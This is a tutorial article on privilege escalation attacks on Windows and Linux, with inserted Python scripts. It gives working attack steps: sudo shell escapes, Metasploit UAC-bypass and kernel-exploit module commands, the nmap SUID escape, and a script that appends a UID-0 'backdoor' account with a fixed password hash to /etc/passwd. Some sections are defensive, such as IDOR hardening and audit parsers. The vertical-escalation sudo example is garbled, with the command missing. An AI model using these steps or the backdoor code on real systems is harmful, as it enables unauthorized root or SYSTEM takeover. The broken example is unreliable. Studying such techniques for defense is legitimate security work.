A privilege escalation attack is a type of cyberattack in which an attacker gains unauthorized access to elevated rights, permissions, entitlements, or privileges beyond those originally assigned to a user, account, identity, or machine.
Privilege escalation is a critical phase in the cyberattack chain and often involves exploiting vulnerabilities such as system bugs, misconfigurations, or weak access controls. By leveraging these weaknesses, attackers can move laterally within a system, gain administrative control, or access sensitive data.
Aim of Privilege Escalation
When we exploit a machine, we usually land as one of:
- Normal/Restricted User: very limited actions.
- Local Administrator (Windows) / a user in sudoers (Linux): higher privileges, but still not the top of the hierarchy (an admin's token is filtered by UAC; a sudo user still has to go through sudo).
Our goal is to escalate further to SYSTEM (Windows) or root (Linux).
- NT AUTHORITY\SYSTEM = the most powerful local account on Windows (above a local Administrator).
- root = the superuser on Linux with total control over files, processes, and users.
Typical post-escalation actions that this level makes reliable:
- Dump password hashes
- Disable security tools
- Persist on the system
- Move laterally in a network

Types Of Privilege Escalation
There are two main types of privilege escalation:
1. Horizontal Privilege Escalation
Horizontal privilege escalation is when an attacker doesn’t become an admin but instead sneaks into another user’s account at the same privilege level, letting them see or use data and resources they shouldn’t normally have access to.

Example (Web Application Based)
Imagine an online banking system where users can view their account details at this URL:
https://bank.com/account?user_id=1234
If a user manually changes the URL to:
https://bank.com/account?user_id=1235
and is able to view another customer's account data, the application is performing no authorization check on the requested object (an insecure direct object reference, IDOR): it verifies that the caller is logged in, but not that the caller owns user_id 1235.
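The banking IDOR above as a vulnerable request handler beside its hardened form. This is an added example, not code from the original article; the account store, user ids and the Session class are constructed stand-ins for a real web framework's database and session objects.

```python
# Constructed sample data: two customers' accounts keyed by user_id.
ACCOUNTS = {
    1234: {"owner": 1234, "balance": 1500.00},
    1235: {"owner": 1235, "balance": 98000.00},
}

class Session:
    """Constructed stand-in for an authenticated web session."""
    def __init__(self, user_id, is_support=False):
        self.user_id = user_id
        self.is_support = is_support  # explicit role that may read any account

def get_account_vulnerable(session, requested_id):
    """Horizontal escalation: the only check is 'logged in', so any
    authenticated user can read any account by changing user_id."""
    if session is None:
        raise PermissionError("login required")
    return ACCOUNTS[requested_id]

def get_account(session, requested_id):
    """Hardened: object-level authorization. The requested object's owner
    must match the caller, or the caller must hold an explicit role."""
    if session is None:
        raise PermissionError("login required")
    account = ACCOUNTS.get(requested_id)
    if account is None or (account["owner"] != session.user_id and not session.is_support):
        # Same error for 'missing' and 'not yours', so the endpoint cannot be
        # used to enumerate which user ids exist.
        raise PermissionError("not found")
    return account

def probe(handler, session, ids):
    """Simulate an attacker iterating user_id values; return the ids that leaked."""
    leaked = []
    for uid in ids:
        try:
            handler(session, uid)
            leaked.append(uid)
        except (PermissionError, KeyError):
            pass
    return leaked

if __name__ == "__main__":
    attacker = Session(1234)
    print("vulnerable handler leaks:", probe(get_account_vulnerable, attacker, [1234, 1235, 9999]))
    print("hardened handler leaks:  ", probe(get_account, attacker, [1234, 1235, 9999]))
```

The fix is not to hide or randomize the id (that only slows enumeration) but to check, on every object access, that the authenticated principal is allowed to see that specific object.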
2. Vertical Privilege Escalation
An attacker can exploit vertical privilege escalation to elevate access from a standard user account to higher-level privileges, such as those of an administrator or superuser. This escalation grants the attacker unrestricted control over the system, enabling them to modify critical configurations, install unauthorized software, create new privileged user accounts, and even delete or manipulate essential data. Such access can severely compromise system integrity, security, and availability.

Example
The sudo command in Linux allows users to run commands with elevated privileges (usually as the root user). It is tightly controlled through the sudoers configuration file, which defines what each user is allowed to run, and as whom.
sudo -u
This spawned a root shell, bypassing the restriction entirely.
Common Methods of Privilege Escalation
Attackers move from limited access to higher-level privileges (admin or root) through technical flaws, user mistakes, or system weaknesses. The most common vectors are:
1. Social Engineering
Attackers manipulate or trick users into revealing sensitive information like passwords or performing actions that grant access. Common methods include phishing emails that impersonate trusted sources to steal credentials, allowing attackers to escalate privileges.
2. Pass-the-Hash / Rainbow Table Attacks
These are two different ways of turning a stolen hash into access. Pass-the-hash reuses the hash itself (typically an NTLM hash on Windows) to authenticate as that user, without ever learning the password; it works wherever hash-based authentication is accepted and no protection such as Credential Guard or the Protected Users group is in place. A rainbow-table attack instead recovers the plaintext offline from a hash using precomputed tables; it is defeated by salted or slow hash functions. Either way, the attacker ends up authenticating as a more privileged account than the one they compromised.
3. Vulnerabilities and Exploits
Attackers exploit software bugs, unpatched vulnerabilities, or buffer overflows to execute malicious code with higher privileges. These flaws allow attackers to bypass normal security controls and gain elevated system access.
4. Misconfigurations
Improperly set permissions, weak passwords, or exposed services create opportunities for attackers to escalate privileges. For example, an unsecured open port or excessive user permissions can be exploited to gain higher access.
5. Kernel Exploits
Attackers exploit vulnerabilities in the operating system kernel, the core component controlling hardware and processes. Since the kernel runs with the highest privileges, these exploits can give attackers full control of the system, bypassing all security measures.

Windows Escalation Paths
When we exploit or get into a Windows machine, these are the most common escalation paths:
1. UAC Bypass – User Account Control (UAC) prompts for confirmation when an action requires elevated privileges; a member of the local Administrators group normally runs with a filtered, medium-integrity token until they approve such a prompt. Weak or misconfigured UAC settings (for example, "never notify", or auto-elevating Windows binaries that can be abused) let an attacker who already has Administrators membership obtain the full high-integrity admin token without any prompt. This is not a jump from a standard user to admin: UAC is a convenience boundary, and once the high-integrity token is obtained, SYSTEM follows trivially (creating a service or impersonating a SYSTEM token).
Practical Use Case
An attacker lands in a medium-integrity shell as a member of the local Administrators group but cannot perform privileged actions because each elevation would trigger a UAC prompt. By exploiting weak UAC settings, they obtain a high-integrity session without user approval.
Step 1: Check current user & privileges
whoami
whoami /priv
Step 2: Look for UAC bypass opportunities
meterpreter > getuid   # Shows current session user
Step 3: If you're a local admin but blocked by UAC prompts, try a bypass module; on success it returns a new, high-integrity session in which NT AUTHORITY\SYSTEM is one token-impersonation step away:
use exploit/windows/local/bypassuac
set session 1
run
getuid
2. Kernel Exploits – The Windows kernel and kernel-mode drivers run at the highest privilege level. A memory-safety bug there lets a low-privileged process execute code as SYSTEM, bypassing every user-mode restriction. Kernel exploits are powerful but risky: a failed attempt usually blue-screens the host, so they are a last resort on production systems.
Practical Use Case
A low-privileged user enumerates the OS version and installed patches and finds the host unpatched. A public local exploit escalates them to SYSTEM. (The classic MS16-032 module used below is strictly a Secondary Logon service bug rather than a kernel bug, but the enumerate-then-match workflow is identical.)
Step 1: Identify the OS version and patch level (the same systeminfo output also lists installed hotfixes)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Step 2: Match the version and missing patches against available local exploits (Metasploit's local exploit suggester module automates this) and run a matching one:
search exploit/windows/local
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
run
3. Misconfigurations – If a service's executable, the directory it lives in, or its configuration has weak permissions, a low-privileged user can replace or reconfigure it. When the service next starts, it executes the attacker's binary with the service account's privileges, usually LocalSystem.
Practical Use Case
A low-privileged user finds a service binary writable by BUILTIN\Users or Everyone. They replace it with a malicious executable (one that adds an admin user or opens a reverse shell). Restarting the service results in SYSTEM-level access; since stopping a service usually requires rights a low-privileged user lacks, waiting for a reboot is often the realistic trigger.
Step 1: Look for service misconfigurations
sc qc <service_name>   # Service config: note BINARY_PATH_NAME (is it quoted?) and SERVICE_START_NAME (LocalSystem?)
icacls "C:\path\to\service.exe"   # Check file permissions: (F), (M) or (W) granted to Users/Everyone means writable
Step 2: If the service binary is writable → back up the original, replace it with the malicious EXE, then restart the service (needs stop/start rights on that service, or a reboot).
net stop <service_name>
net start <service_name>
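The two checks above (service configuration from sc qc, file ACL from icacls) as a parser a practitioner can run over collected output. This is an added example, not code from the original article; both command outputs are constructed samples shaped like the real tools' output, and the sets of low-privileged principals and write-capable rights are assumptions chosen for illustration. It also flags the related unquoted-service-path misconfiguration, which the same sc qc output reveals.

```python
import re

# Constructed sample output, shaped like 'sc qc VulnSvc' on a Windows host.
SC_QC_SAMPLE = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VulnSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Vuln App\service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Vulnerable Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed samples, shaped like 'icacls "C:\Program Files\Vuln App\service.exe"'.
ICACLS_WEAK = r"""C:\Program Files\Vuln App\service.exe BUILTIN\Users:(I)(F)
                                     NT AUTHORITY\SYSTEM:(I)(F)
                                     BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""
ICACLS_OK = r"""C:\Program Files\Vuln App\service.exe NT AUTHORITY\SYSTEM:(I)(F)
                                     BUILTIN\Administrators:(I)(F)
                                     BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals a non-admin attacker is a member of (assumption: common defaults).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
WRITE_RIGHTS = {"F", "M", "W"}   # full, modify, write: each allows replacing the file
ACE_RE = re.compile(r"^(.*?):((?:\([^)]*\))+)$")

def parse_sc_qc(text):
    """Turn the 'KEY : value' lines of sc qc into a dict."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg

def binary_path(cfg):
    """Return (path, was_quoted). A quoted path is taken up to the closing
    quote; an unquoted one is returned as-is (any arguments stay attached)."""
    raw = cfg.get("BINARY_PATH_NAME", "")
    if raw.startswith('"'):
        return raw[1:raw.index('"', 1)], True
    return raw, False

def low_priv_writers(icacls_text, path):
    """Principals from LOW_PRIV holding a write-capable right on 'path'."""
    hits = []
    for line in icacls_text.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):   # first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        principal = m.group(1)
        rights = {r for flag in re.findall(r"\(([^)]*)\)", m.group(2))
                  for r in flag.split(",")}
        granted = rights & WRITE_RIGHTS
        if principal.lower() in LOW_PRIV and granted:
            hits.append((principal, sorted(granted)))
    return hits

def assess_service(sc_qc_text, icacls_text):
    """Combine both outputs into a short list of escalation findings."""
    cfg = parse_sc_qc(sc_qc_text)
    path, quoted = binary_path(cfg)
    findings = []
    writers = low_priv_writers(icacls_text, path)
    if writers:
        findings.append("binary writable by " + ", ".join(p for p, _ in writers))
    if not quoted and " " in path:
        # Unquoted service path: Windows tries C:\Program.exe, then
        # C:\Program Files\Vuln.exe, before the real binary.
        findings.append("unquoted service path with spaces")
    return {
        "name": cfg.get("SERVICE_NAME"),
        "path": path,
        "runs_as_system": cfg.get("SERVICE_START_NAME", "").lower() == "localsystem",
        "findings": findings,
    }

if __name__ == "__main__":
    print(assess_service(SC_QC_SAMPLE, ICACLS_WEAK))
    print(assess_service(SC_QC_SAMPLE, ICACLS_OK))
```

A finding only matters in combination with runs_as_system (or another privileged service account); a writable binary for a service running as a low-privileged virtual account gives far less.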
Linux Escalation Paths
When we exploit or gain access to a Linux machine, these are the most common escalation paths:
1. Sudo Misconfigurations: If a user can run certain commands with sudo without providing a password, or if wildcards/unsafe binaries are allowed, it can lead to root privilege escalation.
Practical Use Case:
An attacker has a low-privileged shell. By checking sudo -l, they find a misconfigured command like sudo vim or sudo find, which allows privilege escalation.
Steps:
sudo -l   # list what this user may run, as whom, and whether a password is required
sudo vim -c ':!/bin/sh'   # vim runs the shell command as root
sudo find / -exec /bin/sh \; -quit   # find runs /bin/sh as root for the first match, then quits
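The two sudo passages above (the sudoers-restriction example under Vertical Privilege Escalation and the sudo -l workflow here) describe reading a sudoers grant and spotting the entries that lead to a shell. The following parser does that over sudo -l output; it is an added example, not code from the original article. The sudo -l text is a constructed sample, and the table of shell escapes is a small assumed subset of the GTFOBins catalogue, not an exhaustive list.

```python
import os
import re

# Constructed sample, shaped like the output of 'sudo -l' for user 'alice'
# on host 'target'. The rules are invented for illustration.
SUDO_L_SAMPLE = """Matching Defaults entries for alice on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim
    (ALL : ALL) /usr/bin/apt-get install *
    (www-data) NOPASSWD: /usr/bin/python3, /usr/bin/less
"""

# Known shell escapes for binaries that may appear in sudoers (assumption:
# a small GTFOBins-style subset).
SHELL_ESCAPES = {
    "find": "sudo find / -exec /bin/sh \\; -quit",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile   then type   !/bin/sh",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
}

# (runas) [TAG: ...] command   e.g.  (root) NOPASSWD: /usr/bin/find
ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")

def parse_sudo_l(text):
    """Return one dict per command spec: runas user, tag set and the command."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything before this is Defaults noise
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user = m.group(1).split(":")[0].strip()   # '(user : group)' -> user
        tags = {t.strip(": ") for t in m.group(2).split() if t.strip()}
        # One sudoers line may carry several commands separated by ", ".
        for cmd in m.group(3).split(", "):
            entries.append({"runas": runas_user, "tags": tags, "cmd": cmd.strip()})
    return entries

def assess(entries):
    """Attach risk notes to each entry; entries with nothing notable are dropped."""
    findings = []
    for e in entries:
        binary = os.path.basename(e["cmd"].split()[0])
        notes = []
        if e["cmd"] == "ALL":
            notes.append("any command")
        if binary in SHELL_ESCAPES:
            notes.append("shell escape: " + SHELL_ESCAPES[binary])
        if "*" in e["cmd"]:
            notes.append("wildcard in command")   # extra arguments may be injectable
        if not notes:
            continue
        findings.append({
            "cmd": e["cmd"],
            "as_root": e["runas"] in ("root", "ALL"),   # ALL includes root
            "nopasswd": "NOPASSWD" in e["tags"],
            "notes": notes,
        })
    return findings

if __name__ == "__main__":
    for f in assess(parse_sudo_l(SUDO_L_SAMPLE)):
        print(f)
```

Note the last sample rule: a shell escape that runs as www-data rather than root is still useful, but it is a horizontal move into another account, not root.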

2. SUID/SGID Binaries
Definition: Binaries with the SUID/SGID bit run with the privileges of the file owner (often root). Misconfigured or exploitable SUID binaries can provide root access.
Practical Use Case:
A low-privileged user finds /usr/bin/nmap with the SUID bit set and owned by root. Old nmap releases (2.02 to 5.21) ship an interactive mode from which a shell can be launched; newer builds dropped it, so check the version first. Other SUID binaries have their own escapes, catalogued on GTFOBins.
Steps:
find / -type f -perm -4000 2>/dev/null   # list SUID files; confirm the owner is root with ls -l
nmap --interactive
!sh   # at the nmap> prompt; the resulting shell runs with effective UID 0

3. Exploiting Kernel Vulnerabilities
Definition: Just like in Windows, an outdated Linux kernel may contain privilege escalation vulnerabilities (e.g., Dirty COW - CVE-2016-5195).
Practical Use Case:
The attacker finds that the kernel is old and matches its version against public exploits. They compile and run one, bearing in mind that kernel exploits can crash the host, that compiling on the target needs gcc (otherwise build elsewhere for the same architecture and libc), and that distributions often backport the fix without changing the version string, so a version match is a lead, not a guarantee.
Steps:
uname -a   # kernel release and architecture
searchsploit linux kernel | grep <version>   # match against Exploit-DB
gcc exploit.c -o exploit   # compile on the target, or elsewhere for the same arch/libc
./exploit
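The SUID enumeration and the kernel-version check from the two paths above, combined into one local enumeration script in the spirit of LinPEAS. This is an added example, not code from the original article. The list of shell-capable binaries is an assumed GTFOBins-style subset, and the Dirty COW version range is the upstream one (introduced in 2.6.22, fixed in 4.8.3); distributions backport the fix without bumping the version, so the check reports candidates, not verdicts.

```python
import os
import re
import stat

# Constructed subset of binaries whose SUID bit is known to yield a shell
# (GTFOBins-style; assumption, not exhaustive).
SHELL_CAPABLE = {"nmap", "vim", "find", "bash", "sh", "python3", "perl", "less", "env", "cp"}

def find_suid(root):
    """Walk 'root' and return sorted (path, owner_uid, bits) for regular files
    with the SUID or SGID bit set; the Python equivalent of
    find ROOT -type f \\( -perm -4000 -o -perm -2000 \\) 2>/dev/null."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue            # unreadable or vanished, like 2>/dev/null
            if not stat.S_ISREG(st.st_mode):
                continue            # symlinks carry no meaningful mode bits
            bits = st.st_mode & (stat.S_ISUID | stat.S_ISGID)
            if bits:
                hits.append((path, st.st_uid, bits))
    return sorted(hits)

def interesting_suid(hits):
    """Root-owned SUID files whose basename is a known shell spawner."""
    return [p for p, uid, bits in hits
            if uid == 0 and bits & stat.S_ISUID and os.path.basename(p) in SHELL_CAPABLE]

def kernel_tuple(release):
    """'4.4.0-31-generic' -> (4, 4, 0); accepts 'uname -r' output."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("not a kernel release string: %r" % release)
    return tuple(int(g or 0) for g in m.groups())

def release_from_uname(uname_a):
    """'Linux target 4.4.0-31-generic #50-Ubuntu SMP ...' -> '4.4.0-31-generic'."""
    return uname_a.split()[2]

# Dirty COW (CVE-2016-5195): present since 2.6.22, fixed upstream in 4.8.3.
# Distributions backport fixes without changing the version string, so a hit
# is a candidate to verify against the distro changelog, not a verdict.
DIRTYCOW_RANGE = ((2, 6, 22), (4, 8, 3))

def dirtycow_candidate(release):
    lo, hi = DIRTYCOW_RANGE
    return lo <= kernel_tuple(release) < hi

if __name__ == "__main__":
    for path in interesting_suid(find_suid("/usr/bin")):
        print("SUID shell spawner:", path)
    rel = os.uname().release
    print(rel, "is a Dirty COW candidate" if dirtycow_candidate(rel) else "is outside the Dirty COW range")
```

Run it as the low-privileged user you landed as: walking / rather than /usr/bin is the real enumeration, and the OSError handling keeps the walk going through directories you cannot read.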


4. Writable /etc/passwd or /etc/shadow
Definition: If /etc/passwd or /etc/shadow files are writable, attackers can insert a new root user or replace the root hash.
Practical Use Case:
The attacker appends a new user with UID 0 (root) to /etc/passwd, placing a password hash directly in the password field; the system honours that hash even though normal accounts keep theirs in /etc/shadow.
Steps:
openssl passwd -1 Pass@123   # generate an md5crypt hash of the chosen password
$1$zIIO5omx$CM5gSOR4/Jq7SUUieEI6T1
backdoor:$1$zIIO5omx$CM5gSOR4/Jq7SUUieEI6T1:0:0:root:/root:/bin/bash   # append this line to /etc/passwd
su backdoor   # enter Pass@123; the resulting shell has UID 0
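The writable-/etc/passwd path above, as a small script that checks writability, builds the UID-0 entry, appends it safely, and lists every UID-0 account (the check a defender runs). This is an added example, not code from the original article; the hash constant is the one shown on the page, and the accepted hash prefixes are an assumption covering the common crypt(3) formats.

```python
import os
import re

# Accepted password-field formats: $1$ (md5crypt, as from 'openssl passwd -1'),
# $5$/$6$ (sha-crypt), $y$ (yescrypt). Assumption: the common crypt(3) prefixes.
CRYPT_RE = re.compile(r"^\$(1|5|6|y)\$[^:]+$")

def passwd_writable(path="/etc/passwd"):
    """True if the real user can write the file (what 'ls -l' plus 'id' would tell you)."""
    return os.access(path, os.W_OK)

def backdoor_entry(user, pw_hash, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """Build the passwd(5) line for a UID-0 account. A hash placed in the
    password field is honoured directly, even on systems that keep real hashes
    in /etc/shadow ('x'), which is why a writable /etc/passwd alone suffices."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]*", user):
        raise ValueError("bad username")
    if not CRYPT_RE.match(pw_hash):
        raise ValueError("not a crypt(3) hash")
    return f"{user}:{pw_hash}:{uid}:{gid}:{user}:{home}:{shell}"

def add_entry(path, line):
    """Append 'line' if the file is writable and the user does not already
    exist; returns True only when the line was written."""
    user = line.split(":")[0]
    if not passwd_writable(path):
        return False
    with open(path) as f:
        content = f.read()
    if any(l.split(":")[0] == user for l in content.splitlines()):
        return False
    with open(path, "a") as f:
        if content and not content.endswith("\n"):
            f.write("\n")           # never glue onto a last line lacking a newline
        f.write(line + "\n")
    return True

def uid0_accounts(path="/etc/passwd"):
    """Defender's check: every account with UID 0. Only 'root' is expected."""
    out = []
    with open(path) as f:
        for l in f:
            fields = l.rstrip("\n").split(":")
            if len(fields) >= 3 and fields[2] == "0":
                out.append(fields[0])
    return out

if __name__ == "__main__":
    print("/etc/passwd writable:", passwd_writable())
    print("UID 0 accounts:", uid0_accounts())
    print(backdoor_entry("backdoor", "$1$zIIO5omx$CM5gSOR4/Jq7SUUieEI6T1"))
```

The newline guard matters: a passwd file whose last line lacks a trailing newline would otherwise have the new entry fused onto it, corrupting both accounts.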

Tools Used in Privilege Escalation
Here is a list of tools commonly used by security professionals and attackers alike:
- Metasploit : A powerful framework for developing and executing exploits, including many for privilege escalation on multiple platforms.
- Mimikatz : Extracts plaintext passwords, hashes, and tokens from Windows memory to facilitate credential theft and privilege escalation.
- PowerUp : A PowerShell tool used to identify and exploit common Windows misconfigurations for privilege escalation.
- WinPEAS : Automates scanning for privilege escalation vectors on Windows systems by checking for misconfigurations and vulnerabilities.
- BloodHound : Maps Active Directory relationships to find paths for privilege escalation and lateral movement within Windows networks.
- LinPEAS : Automates detection of common Linux privilege escalation paths by scanning system configurations and binaries.
- Linux Exploit Suggester : Analyzes kernel version and system info to recommend applicable local privilege escalation exploits.
- GTFOBins : A curated list of Unix binaries that can be abused (via sudo, SUID, capabilities or restricted shells) to bypass restrictions and escalate privileges.
- Cobalt Strike : A commercial tool used for advanced threat emulation and post-exploitation, including privilege escalation capabilities.

Case Study Examples of Privilege Escalation Attack
Here are several real-world examples of privilege escalation attacks covering both vertical and horizontal escalation:
1. Microsoft Windows PrintNightmare (CVE-2021-34527)
PrintNightmare was a flaw in the Windows Print Spooler service, which is enabled by default and runs as SYSTEM: an authenticated user could load a malicious printer driver and so run code with SYSTEM privileges, locally or against a remote print server. It is a textbook vertical escalation: a user with limited permissions gains system-level access and can install software, modify data, or create privileged accounts, compromising the integrity of the entire host.

2. Facebook User IDOR (2015)
In the Facebook User IDOR (2015) vulnerability, an attacker discovered that by simply changing the user ID number in the URL of a request, they could access private information belonging to other users. This happened because the application failed to properly verify whether the requesting user was authorized to view the data associated with the specified user ID.

3. Instagram Account Takeover (2019)
Attackers exploited a weakness in the account recovery process by systematically guessing the recovery PIN codes. This flaw allowed them to bypass authentication and gain access to other users’ accounts without needing elevated privileges.
4. Zoom Mac Exploit (2020)
Attackers took advantage of the Zoom installer’s use of scripts that ran with root privileges. By manipulating these scripts, they were able to execute malicious code on the system with administrator-level access, bypassing normal security controls.
5. Windows Sticky Keys
In the Windows Sticky Keys backdoor technique, an attacker replaces the Sticky Keys executable (sethc.exe) with cmd.exe. When the Sticky Keys shortcut (pressing Shift five times at the logon screen) is triggered, a command prompt opens with SYSTEM-level privileges, giving full control of the system without logging in. Replacing a file in C:\Windows\System32 requires either existing administrator rights or offline access to the disk (booting from installation media), so in practice this is an escalation from physical access or a persistence backdoor rather than a path from a low-privileged shell. Defenders can detect it by alerting on changes to sethc.exe or on cmd.exe being spawned by winlogon.exe at the logon screen.